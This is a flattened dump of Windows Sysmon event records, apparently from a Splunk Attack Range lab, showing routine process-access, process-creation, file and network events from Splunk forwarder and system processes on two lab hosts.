09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.629{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.629{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.629{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8DCB-6151-1E7A-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.629{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DCB-6151-1E7A-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.630{69CF5F33-8DCB-6151-1E7A-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.988{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6616B166751D3C669CCE42950D275794,SHA256=DC6A1209E55DF4891EBCDC3B3B394305181F9D4D0EA5F6DF5D90F3E51CEB84FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:28.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32340ED58E9A0A56740C6F05A141BE66,SHA256=ADD9F007409FDDFE6CD92A20DDEC1FE525842943330FDE181043B3574D4A027D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:24.829{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59548-false10.0.1.14-49672- 354300x8000000000000000981434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:24.516{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64169-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000981433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DCC-6151-1F7A-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8DCC-6151-1F7A-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.332{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DCC-6151-1F7A-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.317{69CF5F33-8DCC-6151-1F7A-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.082{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC99D676DD96C0AACFB9DEB6275FE3F,SHA256=97E6A21FC221E2B90B9ABB7A41416F752D411531A1D58E1575C322A8BA232200,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:26.032{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15WIN-HOST-54259548-false10.0.1.14win-dc-429.attackrange.local49672- 10341000x80000000000000001056890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.780{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DCD-6151-B800-00000000FD01}5476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 